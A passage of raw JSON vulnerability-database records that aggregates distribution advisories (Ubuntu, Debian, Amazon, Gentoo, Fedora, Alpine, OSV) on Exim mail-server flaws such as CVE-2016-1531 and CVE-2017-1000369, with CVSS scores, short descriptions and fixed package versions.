| patches introduce behaviour change that my break existing setups must also ship two follow-up patches: 1- Don't issue env warning if env is empty 2- Store the initial working directory\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-03-02T00:00:00", "type": "ubuntucve", "title": "CVE-2016-1531", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-02T00:00:00", "id": "UB:CVE-2016-1531", "href": "https://ubuntu.com/security/CVE-2016-1531", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2023-12-06T18:21:53", "description": "Exim before 4.87.1 might allow remote attackers to obtain the private DKIM signing key via vectors related to log files and bounce messages.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-02-01T15:59:00", "type": "debiancve", "title": "CVE-2016-9963", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2017-02-01T15:59:00", "id": "DEBIANCVE:CVE-2016-9963", "href": "https://security-tracker.debian.org/tracker/CVE-2016-9963", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T22:23:31", "description": "Exim supports the use of multiple \"-p\" command line arguments which are malloc()'ed and never free()'ed, used in conjunction with other issues allows attackers to cause arbitrary code execution. This affects exim version 4.89 and earlier. Please note that at this time upstream has released a patch (commit 65e061b76867a9ea7aeeb535341b790b90ae6c21), but it is not known if a new point release is available that addresses this issue at this time.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-06-19T16:29:00", "type": "debiancve", "title": "CVE-2017-1000369", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2017-06-19T16:29:00", "id": "DEBIANCVE:CVE-2017-1000369", "href": "https://security-tracker.debian.org/tracker/CVE-2017-1000369", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-06T22:23:31", "description": "Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-07T23:59:00", "type": "debiancve", "title": "CVE-2016-1531", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2016-04-07T23:59:00", "id": "DEBIANCVE:CVE-2016-1531", "href": "https://security-tracker.debian.org/tracker/CVE-2016-1531", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2023-12-06T17:57:18", "description": "**Issue Overview:**\n\nIt was found that Exim leaked DKIM signing private keys to the \"mainlog\" log file. As a result, an attacker with access to system log files could potentially access these leaked DKIM private keys.\n\n \n**Affected Packages:** \n\n\nexim\n\n \n**Issue Correction:** \nRun _yum update exim_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 exim-4.88-2.11.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-mon-4.88-2.11.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-mysql-4.88-2.11.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-pgsql-4.88-2.11.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-debuginfo-4.88-2.11.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-greylist-4.88-2.11.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 exim-4.88-2.11.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 exim-pgsql-4.88-2.11.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-mon-4.88-2.11.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-debuginfo-4.88-2.11.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-mysql-4.88-2.11.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-4.88-2.11.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-greylist-4.88-2.11.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2016-9963](<https://access.redhat.com/security/cve/CVE-2016-9963>)\n\nMitre: [CVE-2016-9963](<https://vulners.com/cve/CVE-2016-9963>)\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-03-06T14:00:00", "type": "amazon", "title": "Medium: exim", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2017-03-06T14:00:00", "id": "ALAS-2017-804", "href": "https://alas.aws.amazon.com/ALAS-2017-804.html", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}], "ubuntu": [{"lastseen": "2023-12-06T16:17:28", "description": "## Releases\n\n * Ubuntu 16.10 \n * Ubuntu 16.04 ESM\n * Ubuntu 14.04 ESM\n * Ubuntu 12.04 \n\n## Packages\n\n * exim4 \\- Exim is a mail transport agent\n\nBjoern Jacke discovered that Exim incorrectly handled DKIM keys. In certain \nconfigurations, private DKIM signing keys could be leaked to the log files.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-01-05T00:00:00", "type": "ubuntu", "title": "Exim vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2017-01-05T00:00:00", "id": "USN-3164-1", "href": "https://ubuntu.com/security/notices/USN-3164-1", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T16:07:43", "description": "## Releases\n\n * Ubuntu 17.04 \n * Ubuntu 16.10 \n * Ubuntu 16.04 ESM\n * Ubuntu 14.04 ESM\n\n## Packages\n\n * exim4 \\- Exim is a mail transport agent\n\nIt was discovered that Exim did not properly deallocate memory when \nprocessing certain command line arguments. A local attacker could use this \nin conjunction with a vulnerability in the underlying kernel to possibly \nexecute arbitrary code and gain administrative privileges.\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-06-19T00:00:00", "type": "ubuntu", "title": "Exim vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2017-06-19T00:00:00", "id": "USN-3322-1", "href": "https://ubuntu.com/security/notices/USN-3322-1", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-07T15:10:33", "description": "## Releases\n\n * Ubuntu 15.10 \n * Ubuntu 14.04 ESM\n * Ubuntu 12.04 \n\n## Packages\n\n * exim4 \\- Exim is a mail transport agent\n\nIt was discovered that Exim incorrectly filtered environment variables when \nused with the perl_startup configuration option. If the perl_startup option \nwas enabled, a local attacker could use this issue to escalate their \nprivileges to the root user. This issue has been fixed by having Exim clean \nthe complete execution environment by default on startup, including any \nsubprocesses such as transports that call other programs. This change in \nbehaviour may break existing installations and can be adjusted by using two \nnew configuration options, keep_environment and add_environment. \n(CVE-2016-1531)\n\nPatrick William discovered that Exim incorrectly expanded mathematical \ncomparisons twice. A local attacker could possibly use this issue to \nperform arbitrary file operations as the Exim user. This issue only \naffected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-2972)\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-03-15T00:00:00", "type": "ubuntu", "title": "Exim vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2972", "CVE-2016-1531"], "modified": "2016-03-15T00:00:00", "id": "USN-2933-1", "href": "https://ubuntu.com/security/notices/USN-2933-1", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-08-05T05:17:56", "description": "\nExim supports the use of multiple \"-p\" command line arguments which are\nmalloc()'ed and never free()'ed, used in conjunction with other issues allows\nattackers to cause arbitrary code execution.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n4.80-7+deb7u5.\n\n\nWe recommend that you upgrade your exim4 packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2017-06-25T00:00:00", "type": "osv", "title": "exim4 - security update", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2022-08-05T05:17:53", "id": "OSV:DLA-1001-1", "href": "https://osv.dev/vulnerability/DLA-1001-1", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-10T07:06:59", "description": "\nThe Qualys Research Labs discovered a memory leak in the Exim mail\ntransport agent. This is not a security vulnerability in Exim by itself,\nbut can be used to exploit a vulnerability in stack handling. For the\nfull details, please refer to their advisory published at:\n<https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt>\n\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 4.84.2-2+deb8u4.\n\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u1.\n\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\n\nWe recommend that you upgrade your exim4 packages.\n\n\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2017-06-19T00:00:00", "type": "osv", "title": "exim4 - security update", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2022-08-10T07:06:36", "id": "OSV:DSA-3888-1", "href": "https://osv.dev/vulnerability/DSA-3888-1", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-28T06:49:51", "description": "\nA local root privilege escalation vulnerability was found in Exim,\nDebian's default mail transfer agent, in configurations using the\nperl\\_startup option (Only Exim via exim4-daemon-heavy enables Perl\nsupport).\n\n\nTo address the vulnerability, updated Exim versions clean the complete\nexecution environment by default, affecting Exim and subprocesses such\nas transports calling other programs, and thus may break existing\ninstallations. New configuration options (keep\\_environment,\nadd\\_environment) were introduced to adjust this behavior.\n\n\nMore information can be found in the upstream advisory at\n[\\\nhttps://www.exim.org/static/doc/CVE-2016-1531.txt](https://www.exim.org/static/doc/CVE-2016-1531.txt)\n\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 4.80-7+deb7u2.\n\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 4.84.2-1.\n\n\nFor the testing distribution (stretch), this problem has been fixed\nin version 4.86.2-1.\n\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 4.86.2-1.\n\n\nWe recommend that you upgrade your exim4 packages.\n\n\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-03-14T00:00:00", "type": "osv", "title": "exim4 - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2023-06-28T06:49:39", "id": "OSV:DSA-3517-1", "href": "https://osv.dev/vulnerability/DSA-3517-1", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2023-12-06T15:52:22", "description": "### Background\n\nExim is a message transfer agent (MTA) developed at the University of Cambridge for use on Unix systems connected to the Internet. \n\n### Description\n\nExim supports the use of multiple \u201c-p\u201d command line arguments causing a memory leak. This could lead to a stack-clash in user-space and as result the attacker can, \u201cclash\u201d or \u201csmash\u201d the stack or another memory region, or \u201cjump\u201d over the stack guard-page. \n\n### Impact\n\nA local attacker could obtain root privileges.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Exim users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-mta/exim-4.89-r1\"", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-09-24T00:00:00", "type": "gentoo", "title": "Exim: Local privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2017-09-24T00:00:00", "id": "GLSA-201709-19", "href": "https://security.gentoo.org/glsa/201709-19", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "description": "Exim is a message transfer agent (MTA) developed at the University of Cambridge for use on Unix systems connected to the Internet. It is freely available under the terms of the GNU General Public Licence. In style it is similar to Smail 3, but its facilities are more general. There is a great deal of flexibility in the way mail can be routed, and there are extensive facilities for checking incoming mail. Exim can be installed in place of sendmail, although the configuration of exim is quite different to that of sendmail. ", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2017-08-31T15:03:35", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: exim-4.89-5.fc26", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2017-08-31T15:03:35", "id": "FEDORA:E514560A8F98", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/NI3SG43RHDCSIG63F3GJFP2DWDBJS36Y/", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Exim is a message transfer agent (MTA) developed at the University of Cambridge for use on Unix systems connected to the Internet. It is freely available under the terms of the GNU General Public Licence. In style it is similar to Smail 3, but its facilities are more general. There is a great deal of flexibility in the way mail can be routed, and there are extensive facilities for checking incoming mail. Exim can be installed in place of sendmail, although the configuration of exim is quite different to that of sendmail. ", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-03-13T09:53:45", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: exim-4.85.2-1.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-13T09:53:45", "id": "FEDORA:27F05611D25E", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GQOBE27UXPWFWLYYSA5EAVR4NMT7NGES/", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Exim is a message transfer agent (MTA) developed at the University of Cambridge for use on Unix systems connected to the Internet. It is freely available under the terms of the GNU General Public Licence. In style it is similar to Smail 3, but its facilities are more general. There is a great deal of flexibility in the way mail can be routed, and there are extensive facilities for checking incoming mail. Exim can be installed in place of sendmail, although the configuration of exim is quite different to that of sendmail. ", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-03-12T11:53:03", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: exim-4.86.2-1.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-12T11:53:03", "id": "FEDORA:D9A2F6002DDF", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3FRQKHOFVDX3TVCBL7KHLODFEIVWPJD6/", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "alpinelinux": [{"lastseen": "2023-12-07T16:20:43", "description": "Exim supports the use of multiple \"-p\" command line arguments which are malloc()'ed and never free()'ed, used in conjunction with other issues allows attackers to cause arbitrary code execution. This affects exim version 4.89 and earlier. Please note that at this time upstream has released a patch (commit 65e061b76867a9ea7aeeb535341b790b90ae6c21), but it is not known if a new point release is available that addresses this issue at this time.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-06-19T16:29:00", "type": "alpinelinux", "title": "CVE-2017-1000369", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2019-12-12T13:35:00", "id": 